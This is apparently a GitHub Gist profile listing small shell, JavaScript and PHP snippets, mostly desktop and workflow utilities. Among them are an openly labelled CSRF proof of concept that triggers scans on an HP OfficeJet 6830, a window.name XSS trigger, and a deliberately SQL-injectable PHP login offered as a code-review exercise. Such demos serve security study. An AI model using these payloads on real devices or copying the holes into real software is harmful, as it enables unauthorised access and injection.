Skip to content

Instantly share code, notes, and snippets.

@nv1t
nv1t / muteTeams.sh
Created Apr 9, 2021
it uses xdotool to activate the Teams window and mute/toggle the microphone. It puts the mouse back to the position.
View muteTeams.sh
function mute() {
eval $(xdotool getmouselocation --shell)
pids=$(xdotool search --name "Microsoft Teams" | sort | uniq | head -n 1)
xdotool windowactivate $pids
xdotool key "ctrl+shift+m"
xdotool mousemove --sync $(( 0.1+$X )) $(( 0.1 + $Y ));
}
@nv1t
nv1t / 81-thinkpad-dock.rules
Created Feb 27, 2021 — forked from seanf/81-thinkpad-dock.rules
Example ThinkPad docking script for multi-monitor
View 81-thinkpad-dock.rules
# Save this file (after modifying ID_VENDOR and ID_MODEL if necessary) as /etc/udev/rules.d/81-thinkpad-dock.rules
# These values seem to work for "ThinkPad Mini Dock Plus Series 3"
SUBSYSTEM=="usb", ACTION=="add|remove", ENV{ID_VENDOR}=="17ef", ENV{ID_MODEL}=="100a", RUN+="/etc/sbin/thinkpad-dock.sh"
@nv1t
nv1t / HP OfficeJet 6830 CSRF.html
Last active Dec 26, 2020
This triggers a scan for a HP OfficeJet 6830 Multidevice. It may work with other Scanner/Printer as well. It only has been tested with this model.
View HP OfficeJet 6830 CSRF.html
<FORM NAME="buy" ENCTYPE="text/plain"
action="http://$IP:8080/Scan/Jobs" METHOD="POST">
<input type="hidden" name='<?xml version'
value='"1.0" encoding="UTF-8"?><ScanSettings xmlns="http://www.hp.com/schemas/imaging/con/cnx/scan/2008/08/19" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/cnx/scan/2008/08/19 Scan Schema - 0.26.xsd"><XResolution>200</XResolution><YResolution>200</YResolution><XStart>0</XStart><YStart>0</YStart><Width>2550</Width><Height>3300</Height><Format>Jpeg</Format><CompressionQFactor>0</CompressionQFactor><ColorSpace>Color</ColorSpace><BitDepth>8</BitDepth><InputSource>Platen</InputSource><GrayRendering>NTSC</GrayRendering><ToneMap><Gamma>1000</Gamma><Brightness>1000</Brightness><Contrast>1000</Contrast><Highlite>179</Highlite><Shadow>25</Shadow><Threshold>0</Threshold></ToneMap><SharpeningLevel>128</SharpeningLevel><NoiseRemoval>0</NoiseRemoval><ContentType>Document</ContentType></ScanSettings>'>
</FORM>
<script>document.buy
@nv1t
nv1t / trigger.html
Created Dec 7, 2020
Executes an XSS based on window.name as global variable existing between states
View trigger.html
Setting "window.name = '&lt;img src=0 onerror=alert(1)&gt;' and redirecting to XSS Page (xss.html) in 5 seconds
<script>
window.name = "<img src=0 onerror=alert(1)>";
setTimeout(function() {
window.location = "xss.html"
},5000);
</script>
View keybase.md

Keybase proof

I hereby claim:

  • I am nv1t on github.
  • I am nv1t (https://keybase.io/nv1t) on keybase.
  • I have a public key whose fingerprint is 7447 AD80 557C 5B6B 20E2 83E9 8F59 D42B C7A5 0438

To claim this, I am signing this object:

@nv1t
nv1t / vulnerable.php
Last active Oct 8, 2020
A Basic Code Review Challenge: How many vulnerabilities are you able to spot.
View vulnerable.php
<?php
session_start();
extract($_GET);
$pdo = new PDO('mysql:host=localhost;dbname=test', 'root', 'toor');
if($action == 'login2') {
$statement = $pdo->prepare("SELECT * FROM users WHERE email = '".$email."'");
$result = $statement->execute();
$user = $statement->fetch();
View install.sh
#!/bin/bash
echo "SUQzBAAAAAAAI1RTU0UAAAAPAAADTGF2ZjU3LjgzLjEwMAAAAAAAAAAAAAAA//tQAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASW5mbwAAAA8AAALKAASOhgADBQgKDQ8SFBcZHB4hJCYp
Ky4wMzU4Oz1AQkVHSk1PUlRXWVxfYWRmaWtucXN2eHt9gIOFiIqNj5KVl5qcn6Gkp6msrrGztrm7
vsDDxcjKzc/S1dfa3N/h5Obp6+7w8/X4+v0AAAAATGF2YzU3LjEwAAAAAAAAAAAAAAAAJAMAAAAA
AAAEjoZ7ltZvAAAAAAAAAAAAAAAAAAAAAP/7kGQAAALAR8aYwxYQMUKoYxhpdBDBiR6MJFjA2Qmk
dDeUcAAQVJaQPJ7FthiB6bY5OgGuC9IEFAMILHgiAOP7JxhkgNYIoAU/9zAz4lNOBEznO5BfpyMd
yfQk5+//9CKdlcjb56EnyKjBxaAAAJhis4f8u8of9gf8QCcAMtp7mKJptJMoLMUToEGW4AXu7mhw
n2oIIhQxPbRgQZ743Od/UN//7j//rewaO0f6QCCBAAksBiAZDWVfO49rJ2cP8tAMBL6i517xxwwM
@nv1t
nv1t / struct.js
Created Mar 15, 2020
Simple angular module deconstruct binary data in JavaScript to a readable dictionary
View struct.js
angular.module('struct',[]);
angular.module('struct')
.service('struct',[function(){
vm = this;
vm.parse = function(stream,header) {
var temp = [];
for(var i in stream) {
temp[i] = ("00000000"+(stream[i] >>> 0).toString(2)).slice(-8);
}
@nv1t
nv1t / dvb.sh
Created Dec 18, 2019
function liest die naechsten Abfahrten an einer Station von der DVB in Dresden aus.
View dvb.sh
# Usage: dvb <station>
# Default for <station> is "Hauptbahnhof"
function dvb() {
station=${@:-Hauptbahnhof}
http --body "widgets.vvo-online.de/abfahrtsmonitor/Abfahrten.do?ort=Dresden&hst=${station}" | jq -r '.[] | [.[2],.[0],.[1]] | @tsv'
}
@nv1t
nv1t / rmvirtualenv.sh
Created Dec 17, 2019
I work with pipenv a lot. Sometimes a delete or move a directory and forget to delete the virtualenv and so it lingers around in .local. this is a small wrapper to delete all the orphaned virtualenv directories :)
View rmvirtualenv.sh
function rmvirtualenv() {
for i in ~/.local/share/virtualenvs/*/.project; do
venv=$(dirname "${i}")
directory=$(cat "${i}")
echo "${venv}"
if [ -d "${directory}" ] && [ -f "${directory}/Pipfile" ]; then
echo -n "[+] "
else
echo -n "[-] "